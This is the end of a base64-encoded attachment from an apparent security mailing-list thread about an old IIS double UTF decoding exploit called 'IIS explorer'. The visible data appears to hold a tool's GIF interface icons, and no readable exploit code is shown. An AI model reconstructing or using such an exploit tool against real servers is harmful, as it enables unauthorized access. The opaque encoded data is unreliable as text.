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 gA== ------=_NextPart_000_000A_01C22900.51AF7FB0--
Current thread:
- IIS double UTF decoding bug (old) exploit: IIS explorer Berend-Jan Wever (Jul 11)
